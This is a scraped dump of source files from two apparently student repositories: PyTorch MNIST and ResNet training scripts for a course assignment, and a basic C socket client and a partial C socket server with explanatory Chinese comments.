7 x 7 x 128\n\t\tpool4_size, pool4_stride = 3, 2\n\n\t\tmlp1_out = 2048\n\t\tmlp2_out = 2048\n\t\tmlp3_out = 1\n\t\t\n\n\t\tself.features = nn.Sequential(\n\t\t\tnn.BatchNorm2d(in_dim[-1]),\n\t\t\tnn.Conv2d(in_dim[-1], conv1_out_chan, kernel_size=conv1_kern_size,\n\t\t\t\tstride=conv1_stride, padding=conv1_pad),\n\t\t\tnn.MaxPool2d(kernel_size=pool1_size, stride=pool1_stride),\n\t\t\tnn.ReLU(inplace=True),\n\t\t\tnn.BatchNorm2d(conv1_out_chan),\n\t\t\tnn.Conv2d(conv1_out_chan, conv2_out_chan, kernel_size=conv2_kern_size,\n\t\t\t\tstride=conv2_stride, padding=conv2_pad),\n\t\t\tnn.MaxPool2d(kernel_size=pool2_size, stride=pool2_stride),\n\t\t\tnn.ReLU(inplace=True),\n\t\t\tnn.BatchNorm2d(conv2_out_chan),\n\t\t\tnn.Conv2d(conv2_out_chan, conv3_out_chan, kernel_size=conv3_kern_size,\n\t\t\t\tstride=conv3_stride, padding=conv3_pad),\n\t\t\tnn.ReLU(inplace=True),\n\t\t\tnn.BatchNorm2d(conv3_out_chan),\n\t\t\tnn.Conv2d(conv3_out_chan, conv4_out_chan, kernel_size=conv4_kern_size,\n\t\t\t\tstride=conv4_stride, padding=conv4_pad),\n\t\t\tnn.MaxPool2d(kernel_size=pool4_size, stride=pool4_stride),\n\t\t\tnn.ReLU(inplace=True),\n\t\t\tnn.BatchNorm2d(conv4_out_chan)\n\t\t\t)\n\n\t\tself.classifier = nn.Sequential(\n\t\t\tnn.Linear(7*7*conv4_out_chan, mlp1_out, bias=False),\n\t\t\tnn.BatchNorm1d(mlp1_out),\n\t\t\tnn.ReLU(inplace=True),\n\t\t\tnn.Dropout(0.5),\n\t\t\tnn.Linear(mlp1_out, mlp2_out, bias=False),\n\t\t\tnn.BatchNorm1d(mlp2_out),\n\t\t\tnn.ReLU(inplace=True),\n\t\t\tnn.Dropout(0.5),\n\t\t\tnn.Linear(mlp2_out, mlp3_out)\n\t\t\t)\n\n\t\tself.out_chan = conv4_out_chan\n\n\n\tdef forward(self, x):\n\t\tself.f = self.features(x)\n\t\tf = self.f.view(-1, 7*7*self.out_chan)\n\t\tc = self.classifier(f)\n\t\treturn c\n\nclass BottleneckBlock(nn.Module):\n\texpansion = 4\n\n\tdef __init__(self, in_chan, out_chan, stride=1, downsample=None):\n\n\t\tsuper(BottleneckBlock, self).__init__()\n\n\t\tself.conv1 = nn.Conv2d(in_chan, out_chan, kernel_size=1, bias=False)\n\t\tself.bn1 = nn.BatchNorm2d(out_chan)\n\t\tself.conv2 = nn.Conv2d(out_chan, out_chan, kernel_size=3, stride=stride,\n\t\t\t\t\t\t\t padding=1, bias=False)\n\t\tself.bn2 = nn.BatchNorm2d(out_chan)\n\t\tself.conv3 = nn.Conv2d(out_chan, out_chan * 4, kernel_size=1, bias=False)\n\t\tself.bn3 = nn.BatchNorm2d(out_chan * 4)\n\t\tself.relu = nn.ReLU(inplace=True)\n\t\tself.downsample = downsample\n\t\tself.stride = stride\n\n\tdef forward(self, x):\n\t\tresidual = x\n\n\t\tconv1 = self.conv1(x)\n\t\tconv1 = self.bn1(conv1)\n\t\tconv1 = self.relu(conv1)\n\n\t\tconv2 = self.conv2(conv1)\n\t\tconv2 = self.bn2(conv2)\n\t\tconv2 = self.relu(conv2)\n\n\t\tconv3 = self.conv3(conv2)\n\t\tconv3 = self.bn3(conv3)\n\n\t\tif self.downsample is not None:\n\t\t\tresidual = self.downsample(x)\n\n\t\tout = conv3 + residual\n\t\tout = self.relu(out)\n\n\t\treturn out\n\nclass ResNet(nn.Module):\n\n\tdef __init__(self, block, layers, num_classes=1):\n\t\tself.in_chan = 64\n\t\tsuper(ResNet, self).__init__()\n\t\tself.conv1 = nn.Conv2d(3, self.in_chan, kernel_size=5, stride=1, padding=3,\n\t\t\t\t\t\t\t bias=False)\n\t\tself.bn1 = nn.BatchNorm2d(self.in_chan)\n\t\tself.relu = nn.ReLU(inplace=True)\n\t\tself.maxpool = nn.MaxPool2d(kernel_size=3, stride=1, padding=1)\n\t\tself.layer1 = self._make_layer(block, 64, layers[0])\n\t\tself.layer2 = self._make_layer(block, 128, layers[1], stride=2)\n\t\tself.layer3 = self._make_layer(block, 256, layers[2], stride=2)\n\t\tself.layer4 = self._make_layer(block, 512, layers[3], stride=2)\n\t\tself.avgpool = nn.AvgPool2d(7, stride=1)\n\t\tself.fc = nn.Linear(4608 * block.expansion, num_classes)\n\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.Conv2d):\n\t\t\t\tn = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n\t\t\t\tm.weight.data.normal_(0, math.sqrt(2. / n))\n\t\t\telif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.weight.data.fill_(1)\n\t\t\t\tm.bias.data.zero_()\n\n\tdef _make_layer(self, block, out_chan, blocks, stride=1):\n\n\t\tdownsample = None\n\t\tif stride != 1 or self.in_chan != out_chan * block.expansion:\n\t\t\tdownsample = nn.Sequential(\n\t\t\t\tnn.Conv2d(self.in_chan, out_chan * block.expansion,\n\t\t\t\t\t\t kernel_size=1, stride=stride, bias=False),\n\t\t\t\tnn.BatchNorm2d(out_chan * block.expansion),\n\t\t\t)\n\n\t\tlayers = []\n\t\tlayers.append(block(self.in_chan, out_chan, stride, downsample))\n\t\tself.in_chan = out_chan * block.expansion\n\t\tfor i in range(1, blocks):\n\t\t\tlayers.append(block(self.in_chan, out_chan))\n\n\t\treturn nn.Sequential(*layers)\n\n\tdef forward(self, x):\n\t\tx = self.conv1(x)\n\t\tx = self.bn1(x)\n\t\tx = self.relu(x)\n\t\tx = self.maxpool(x)\n\t\tx = self.layer1(x)\n\t\tx = self.layer2(x)\n\t\tx = self.layer3(x)\n\t\tx = self.layer4(x)\n\n\t\tx = self.avgpool(x)\n\t\tx = x.view(x.size(0), -1)\n\t\tx = self.fc(x)\n\n\t\treturn x\n\n\n"
},
{
"alpha_fraction": 0.5561808347702026,
"alphanum_fraction": 0.5873194336891174,
"avg_line_length": 32.955413818359375,
"blob_id": "1a20e3d2e9ed1c0881e19d031b1da00030de91e0",
"content_id": "3e1655e93e6f4a005b02bff6e06d03587ee6a0f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5331,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 157,
"path": "/part1/b.py",
"repo_name": "oooolga/IFT6135-A2",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nfrom torch.autograd import Variable\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport ipdb\n\n# Training settings\nparser = argparse.ArgumentParser(description='PyTorch MNIST Example')\nparser.add_argument('--batch-size', type=int, default=64, metavar='N',\n help='input batch size for training (default: 64)')\nparser.add_argument('--epochs', type=int, default=100, metavar='N',\n help='number of epochs to train (default: 10)')\nparser.add_argument('--log-interval', default=10)\n\nargs = parser.parse_args()\nargs.cuda = torch.cuda.is_available()\n\n\nkwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {}\ntrain_loader = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=True, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=args.batch_size, shuffle=True, **kwargs)\ntest_loader = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=args.batch_size, shuffle=True, **kwargs)\n\ndef weight_init(m):\n classname = m.__class__.__name__\n if classname.find('Linear') != -1:\n torch.nn.init.xavier_uniform(m.weight.data)\n m.bias.data.fill_(0)\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.fc1 = nn.Linear(784, 800)\n self.fc2 = nn.Linear(800, 800)\n self.do = nn.Dropout()\n self.fc = nn.Linear(800, 10)\n\n self.apply(weight_init)\n self.weights = [ self.fc1.weight, self.fc2.weight, self.fc.weight]\n\n def forward(self, x):\n tmp = F.relu(self.fc1(x))\n tmp = F.relu(self.fc2(tmp))\n tmp = self.do(tmp)\n tmp = self.fc(tmp)\n return F.log_softmax(tmp)\n\n def predict1(self, x, N):\n tmp = F.relu(self.fc1(x))\n tmp = F.relu(self.fc2(tmp))\n tmp = self.fc(tmp*0.5)\n return F.log_softmax(tmp)\n\n def predict2(self, x, N):\n tmp = F.relu(self.fc1(x))\n tmp = F.relu(self.fc2(tmp))\n pre_softmax = 0\n for _ in range(N):\n pre_softmax += 1.0/N * self.fc(self.do(tmp))\n return F.log_softmax(pre_softmax)\n\n def predict3(self, x, N):\n tmp = F.relu(self.fc1(x))\n tmp = F.relu(self.fc2(tmp))\n preds = 0\n for _ in range(N):\n pre_softmax = self.fc(self.do(tmp))\n preds += F.log_softmax(pre_softmax) * 1.0 / N\n return preds\n\nmodel = Net()\nif args.cuda:\n model.cuda()\n\noptimizer = optim.SGD(model.parameters(), lr=0.02)\n\n\n\ndef test(N, mode):\n test_loss = 0\n correct = 0\n for data, target in test_loader:\n if args.cuda:\n data, target = data.cuda(), target.cuda()\n data, target = Variable(data, volatile=True), Variable(target)\n\n if mode == 1:\n output = model.predict1(data.view(-1, 784), N)\n if mode == 2:\n output = model.predict2(data.view(-1, 784), N)\n if mode == 3:\n output = model.predict3(data.view(-1, 784), N)\n\n test_loss += F.nll_loss(output, target, size_average=False).data[0] # sum up batch loss\n pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(target.data.view_as(pred)).long().cpu().sum()\n\n test_loss /= len(test_loader.dataset)\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss, correct, len(test_loader.dataset),\n 100. * correct / len(test_loader.dataset)))\n return 100. * correct / len(test_loader.dataset)\n\nfor epoch in range(1, args.epochs + 1):\n model.train()\n correct = 0\n for batch_idx, (data, target) in enumerate(train_loader):\n if args.cuda:\n data, target = data.cuda(), target.cuda()\n data, target = Variable(data), Variable(target)\n optimizer.zero_grad()\n output = model(data.view(-1, 784))\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.step()\n\n pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(target.data.view_as(pred)).long().cpu().sum()\n\n if batch_idx % args.log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.data[0]))\n\nNs = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100]\ntest_accs1 = []\ntest_accs2 = []\ntest_accs3 = []\nfor N in Ns:\n test_accs1.append(test(N, 1))\n test_accs2.append(test(N, 2))\n test_accs3.append(test(N, 3))\n\nplt.figure()\nplt1, = plt.plot(Ns, test_accs1)\nplt2, = plt.plot(Ns, test_accs2)\nplt3, = plt.plot(Ns, test_accs3)\nplt.legend([plt1,plt2,plt3], [\"mode1\", \"mode2\", \"mode3\"])\nplt.savefig(\"compare_prediction.png\")\n"
},
{
"alpha_fraction": 0.4727668762207031,
"alphanum_fraction": 0.5001556277275085,
"avg_line_length": 35.10112380981445,
"blob_id": "21dd379572715a1c1644d8e281aa71f45845ec13",
"content_id": "2acce6a664acf0ab7a74f23640f98637a5cde771",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6426,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 178,
"path": "/part1/c.py",
"repo_name": "oooolga/IFT6135-A2",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nfrom torch.autograd import Variable\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport ipdb\n\n# Training settings\nparser = argparse.ArgumentParser(description='PyTorch MNIST Example')\nparser.add_argument('--batch-size', type=int, default=100, metavar='N',\n help='input batch size for training (default: 64)')\nparser.add_argument('--epochs', type=int, default=10, metavar='N',\n help='number of epochs to train (default: 10)')\nparser.add_argument('--use-bn', action='store_true')\nparser.add_argument('--log-interval', default=10)\n\nargs = parser.parse_args()\nargs.cuda = torch.cuda.is_available()\n\n\nkwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {}\ntrain_loader = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=True, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=args.batch_size, shuffle=True, **kwargs)\ntest_loader = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=args.batch_size, shuffle=True, **kwargs)\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n if not args.use_bn:\n self.conv = nn.Sequential(\n nn.Conv2d(in_channels=1,\n out_channels=16,\n kernel_size=(3, 3),\n padding=1),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=(2,2),stride=2),\n\n nn.Conv2d(in_channels=16,\n out_channels=32,\n kernel_size=(3,3),\n padding=1),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=(2,2),\n stride=2),\n\n nn.Conv2d(in_channels=32,\n out_channels=64,\n kernel_size=(3,3),\n padding=1),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=(2,2),\n stride=2),\n\n nn.Conv2d(in_channels=64,\n out_channels=128,\n kernel_size=(3,3),\n padding=1),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=(2,2),\n stride=2)\n )\n else:\n self.conv = nn.Sequential(\n nn.Conv2d(in_channels=1,\n out_channels=16,\n kernel_size=(3, 3),\n padding=1),\n nn.BatchNorm2d(16),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=(2,2),stride=2),\n\n nn.Conv2d(in_channels=16,\n out_channels=32,\n kernel_size=(3,3),\n padding=1),\n nn.BatchNorm2d(32),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=(2,2),\n stride=2),\n\n nn.Conv2d(in_channels=32,\n out_channels=64,\n kernel_size=(3,3),\n padding=1),\n nn.BatchNorm2d(64),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=(2,2),\n stride=2),\n\n nn.Conv2d(in_channels=64,\n out_channels=128,\n kernel_size=(3,3),\n padding=1),\n nn.BatchNorm2d(128),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=(2,2),\n stride=2)\n )\n self.clf = nn.Linear(128, 10)\n\n def forward(self, x):\n tmp = self.clf(self.conv(x).squeeze())\n return F.log_softmax(tmp)\n\nmodel = Net()\nif args.cuda:\n model.cuda()\n\n\noptimizer = torch.optim.Adam(model.parameters(), lr=1e-4)\n\n\ndef test():\n model.eval()\n test_loss = 0\n correct = 0\n for data, target in test_loader:\n if args.cuda:\n data, target = data.cuda(), target.cuda()\n data, target = Variable(data, volatile=True), Variable(target)\n output = model(data)\n test_loss += F.nll_loss(output, target, size_average=False).data[0] # sum up batch loss\n pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(target.data.view_as(pred)).long().cpu().sum()\n\n test_loss /= len(test_loader.dataset)\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss, correct, len(test_loader.dataset),\n 100. * correct / len(test_loader.dataset)))\n return 100. * correct / len(test_loader.dataset)\n\ntrain_accs = []\ntest_accs = []\nfor epoch in range(1, args.epochs + 1):\n model.train()\n correct = 0\n for batch_idx, (data, target) in enumerate(train_loader):\n if args.cuda:\n data, target = data.cuda(), target.cuda()\n data, target = Variable(data), Variable(target)\n optimizer.zero_grad()\n output = model(data)\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.step()\n\n pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(target.data.view_as(pred)).long().cpu().sum()\n\n if batch_idx % args.log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.data[0]))\n train_accs.append(100. * correct / len(train_loader.dataset))\n test_accs.append(test())\n\nplt.figure()\ntr_plt, = plt.plot(train_accs)\nte_plt, = plt.plot(test_accs)\nplt.legend([tr_plt, te_plt], ['train_acc', 'test_acc'])\nplt.savefig('c_accs.png')\n"
},
{
"alpha_fraction": 0.6628878116607666,
"alphanum_fraction": 0.6718376874923706,
"avg_line_length": 31.882352828979492,
"blob_id": "1c576f139baaf82c33e33f8195d45a81d776330e",
"content_id": "e226f5ec5dee96f82c9b31a251b289f52621d49e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1676,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 51,
"path": "/part2/main.py",
"repo_name": "oooolga/IFT6135-A2",
"src_encoding": "UTF-8",
"text": "__author__\t= \t\"Olga (Ge Ya) Xu\"\n__email__ \t=\t\"[email protected]\"\n\nfrom util import *\n\ndef parse():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('-lr', '--learning_rate', default=1e-2, type=float,\n\t\t\t\t\t\thelp='Learning rate')\n\tparser.add_argument('-m', '--momentum', default=0.2, type=float, help=\"Momentum\")\n\tparser.add_argument('-s', '--seed', default=111, type=int, help='Random seed')\n\tparser.add_argument('--batch_size', default=64, type=int,\n\t\t\t\t\t\thelp='Mini-batch size for training')\n\tparser.add_argument('--test_batch_size', default=200, type=int,\n\t\t\t\t\t\thelp='Mini-batch size for testing')\n\tparser.add_argument('--epoch', default=13, type=int, help='Number of epochs')\n\tparser.add_argument('-o', '--optimizer', default='SGD', type=str, help='Optimizer')\n\tparser.add_argument('-n', '--model_name', default='model_1', type=str, help='Model name')\n\n\targs = parser.parse_args()\n\treturn args\n\ndef output_arguments(args):\n\tprint 'Model name:\\t\\t{}'.format(args.model_name)\n\tprint 'Seed:\\t\\t\\t{}'.format(args.seed)\n\tprint 'Total epoch:\\t\\t{}'.format(args.epoch)\n\tprint 'Batch size:\\t\\t{}'.format(args.batch_size)\n\tprint 'Learning rate:\\t\\t{}'.format(args.learning_rate)\n\tprint 'Optimizer:\\t\\t{}'.format(args.optimizer)\n\n\nif __name__ == '__main__':\n\n\targs = parse()\n\n\tprint 'Loading data...'\n\t#seperate_data()\n\ttrain_loader, valid_loader, test_loader = load_data(batch_size=args.batch_size,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\ttest_batch_size=args.test_batch_size)\n\n\tprint 'Loading model...\\n'\n\n\tmodel = Net()\n\n\toutput_arguments(args)\n\n\tif use_cuda:\n\t\tmodel.cuda()\n\n\trun(model, train_loader, valid_loader, test_loader, args.model_name, args.epoch,\n\t\targs.learning_rate, args.optimizer, args.momentum)"
},
{
"alpha_fraction": 0.587890625,
"alphanum_fraction": 0.6108940839767456,
"avg_line_length": 33.13333511352539,
"blob_id": "3b072b660c964464adcb2de7521629999586966a",
"content_id": "9eaad93b3d640a9083ad766061de15107691f43d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4608,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 135,
"path": "/part1/a.py",
"repo_name": "oooolga/IFT6135-A2",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nfrom torch.autograd import Variable\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport ipdb\n\n# Training settings\nparser = argparse.ArgumentParser(description='PyTorch MNIST Example')\nparser.add_argument('--batch-size', type=int, default=64, metavar='N',\n help='input batch size for training (default: 64)')\nparser.add_argument('--epochs', type=int, default=100, metavar='N',\n help='number of epochs to train (default: 10)')\nparser.add_argument('--wd', type=float, default=2.5e-5)\nparser.add_argument('--log-interval', default=10)\n\nargs = parser.parse_args()\nargs.cuda = torch.cuda.is_available()\n\n\nkwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {}\ntrain_loader = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=True, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=args.batch_size, shuffle=True, **kwargs)\ntest_loader = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=args.batch_size, shuffle=True, **kwargs)\n\ndef weight_init(m):\n classname = m.__class__.__name__\n if classname.find('Linear') != -1:\n torch.nn.init.xavier_uniform(m.weight.data)\n m.bias.data.fill_(0)\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.fc1 = nn.Linear(784, 800)\n self.fc2 = nn.Linear(800, 800)\n self.fc = nn.Linear(800, 10)\n\n self.apply(weight_init)\n self.weights = [ self.fc1.weight, self.fc2.weight, self.fc.weight]\n\n def forward(self, x):\n tmp = F.relu(self.fc1(x))\n tmp = F.relu(self.fc2(tmp))\n tmp = self.fc(tmp)\n return F.log_softmax(tmp)\n\ndef model_l2_norm(model):\n norm = 0\n for p in model.weights:\n norm += p.pow(2).sum().data\n return norm[0]\n\nmodel = Net()\nif args.cuda:\n model.cuda()\n\noptimizer = optim.SGD(model.parameters(), lr=0.02, weight_decay=args.wd)\n\n\n\ndef test():\n model.eval()\n test_loss = 0\n correct = 0\n for data, target in test_loader:\n if args.cuda:\n data, target = data.cuda(), target.cuda()\n data, target = Variable(data, volatile=True), Variable(target)\n output = model(data.view(-1, 784))\n test_loss += F.nll_loss(output, target, size_average=False).data[0] # sum up batch loss\n pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(target.data.view_as(pred)).long().cpu().sum()\n\n test_loss /= len(test_loader.dataset)\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss, correct, len(test_loader.dataset),\n 100. * correct / len(test_loader.dataset)))\n return 100. * correct / len(test_loader.dataset)\n\nnorms = []\ntrain_accs = []\ntest_accs = []\nfor epoch in range(1, args.epochs + 1):\n model.train()\n correct = 0\n for batch_idx, (data, target) in enumerate(train_loader):\n if args.cuda:\n data, target = data.cuda(), target.cuda()\n data, target = Variable(data), Variable(target)\n optimizer.zero_grad()\n output = model(data.view(-1, 784))\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.step()\n\n pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(target.data.view_as(pred)).long().cpu().sum()\n\n norms.append(model_l2_norm(model))\n if batch_idx % args.log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.data[0]))\n train_accs.append(100. * correct / len(train_loader.dataset))\n test_accs.append(test())\n\nipdb.set_trace()\nplt.figure()\nplt.plot(norms)\nplt.title(\"l2 norms\")\nplt.savefig('a_l2_norms.png')\n\nplt.figure()\ntr_plt, = plt.plot(train_accs)\nte_plt, = plt.plot(test_accs)\nplt.legend([tr_plt, te_plt], ['train_acc', 'test_acc'])\nplt.savefig('a_accs.png')\n"
},
{
"alpha_fraction": 0.3076923191547394,
"alphanum_fraction": 0.692307710647583,
"avg_line_length": 12,
"blob_id": "f9585651f253bb61ba686a693fe83f8dac58a885",
"content_id": "e5eb88f1a317cc37b9bf067478dc958064166657",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 13,
"license_type": "no_license",
"max_line_length": 12,
"num_lines": 1,
"path": "/README.md",
"repo_name": "oooolga/IFT6135-A2",
"src_encoding": "UTF-8",
"text": "# IFT6135-A2\n"
}
] | 8 |
sakishum/My_Socket | https://github.com/sakishum/My_Socket | 31c2e8c032a91ad7a4fd5ca458534d2330c6ee8f | 02be0bb4a435c42a26efc56932baab7327d60d8b | 07cf29c77c868d340b977e8a7eaf0efd6f8435dd | refs/heads/master | 2021-01-11T14:24:48.738796 | 2017-02-09T00:13:58 | 2017-02-09T00:13:58 | 81,389,573 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5853881239891052,
"alphanum_fraction": 0.6127853989601135,
"avg_line_length": 20.8799991607666,
"blob_id": "1882a3845d323ed430cb3a6fddf7fc8c0a64f52d",
"content_id": "f2dd4c795d1bd62660541da4fcb65c93cdbbf06c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1131,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 50,
"path": "/socket_test/main.c",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "/* Copyright(C)\n * For free\n * All right reserved\n */\n/**\n * @file main.c\n * @Synopsis Example for socket client in C.\n *\t\tinput:\t./test 127.0.0.1 8888\n * @author Saki Shum, [email protected]\n * @version 0.0.1\n * @date 2013-09-04\n */\n\n#include <netinet/in.h>\n// ----------- Socket -------------\n#include <sys/types.h>\n#include <sys/socket.h>\n// ----------- Socket -------------\n#include <arpa/inet.h>\n#include <unistd.h>\n\n#include <stdlib.h>\n#include <stdio.h>\n#include <stdint.h>\n#include <string.h>\n#include <errno.h>\n\nint main(int argc, char* argv[]) {\n\tif (argc < 3) {\n\t\tprintf(\"connect address prot\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\t// domain:IPv4 type:TCP\tprotocol:当protocol为0时,会自动选择type类型对应的默认协议\n\tint fd = socket(AF_INET, SOCK_STREAM, 0);\n\tstruct sockaddr_in my_addr;\n\n\tmy_addr.sin_addr.s_addr = inet_addr(argv[1]);\n\tmy_addr.sin_family = AF_INET;\t\n\tmy_addr.sin_port = htons(strtol(argv[2], NULL, 10));\n\n\tint ret = connect(fd, (struct sockaddr*)&my_addr, sizeof(struct sockaddr_in));\n\n\tif (-1 == ret) {\n\t\tperror(\"Connect failed:\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tclose(fd);\n\texit(EXIT_SUCCESS);\n}\n\n"
},
{
"alpha_fraction": 0.6072767376899719,
"alphanum_fraction": 0.6304299831390381,
"avg_line_length": 29.233333587646484,
"blob_id": "bfda6272b6c792ae35154bd32d7a9735d8f64229",
"content_id": "b8bd08633a534cc4a9563236079669a34011ad8a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 5961,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 150,
"path": "/socket_example/server.c",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "#include <sys/types.h>\n#include <sys/socket.h>\n#include <stdio.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\n#include <unistd.h>\n#include <stdlib.h>\n#include <string.h>\n\n// 打开—读/写—关闭 模式\n// SBLARSC\n// socket -> bind -> listen -> accept -> recv -> send -> close\n// 1) 创建 socket\n// 2)绑定 socket 和 端口号, bind\n// 3)监听该端口, listen\n// 4)接收来自客户端的连接请求, accept\n// 5)从 socket 中读取数据, recv\n// 6)向 socket 中发送数据, send\n// 7)关闭 socket, close\n\n#define PORT 12000\n#define BUFFER_SIZE 40\n\n/*\n * 用于保存 socket 信息的结构体\n * struct sockaddr {\n * \t\tunsigned short sa_family;\t\t\t// 2 , 地址族, AF_xxx\n * \tchar sa_data[14];\t\t\t\t\t// 14, 字节的协议地址\n * };\n *\n * 比 sockaddr 更方便使用的结构:\n * 16 Byte:\n * struct sockaddr_in { \n *\t\tshort int \t\t\tsin_family; // 2, 地址族\n * \t\tunsigned short int sin_port; \t// 2, 端口号(2^16, 1~1024 为保留端口,选择 1025~65535 之间的端口号)\n * \t\tstruct in_addr \tsin_addr; \t// 4, 32 位 IP 地址\n * \t\tunsigned char \tsin_zero[8]; // 8, 以 0 填充以保持与 struct sockaddr 同样大小\n * };\n *\n * // 包含该 socket 的 IP地址和端口号\n * struct in_addr { \n * \t\tunion {\n * \t\t\tstruct { u_char s_b1,s_b2,s_b3,s_b4; } S_un_b;\n * \t\t\tstruct { u_short s_w1,s_w2; } S_un_w;\n * \t\t\tu_long S_addr; \n * \t} S_un;\n * \t#define s_addr S_un.S_addr\n * }; \n * */\n\n// 两个网络程序之间的一个网络连接包含 5 种信息:\n// 通信协议、本地协议地址、本地主机端口、远端协议地址和远端协议端口\n\nvoid err_sys(const char *str) {\n\tperror(str);\n}\n\n// wrapper function\nint Socket(int family, int type, int protocol) {\n\tint n = 0;\n\tif ((n = socket(family, type, protocol)) < 0) {\n\t\terr_sys(\"Socket error.\");\n\t}\n\treturn n;\n}\n\nint main(void) {\n char buf[BUFFER_SIZE];\n int server_sockfd, client_sockfd;\n size_t sin_size = sizeof(struct sockaddr_in);\n struct sockaddr_in server_address;\n struct sockaddr_in client_address;\n memset(&server_address, 0, sizeof(server_address));\n\n\t// 无论是TCP还是UDP,socket 都需要与一个本地的IP与端口相对应,称之为 源地址 和 源端口。\n\t// 当只有单一IP的时候,就可以用INADDR_ANY代替那个单一的IP,因为内核分配时只能选择这一个IP。\n\t// INADDR_ANY 所有本机 IP\n 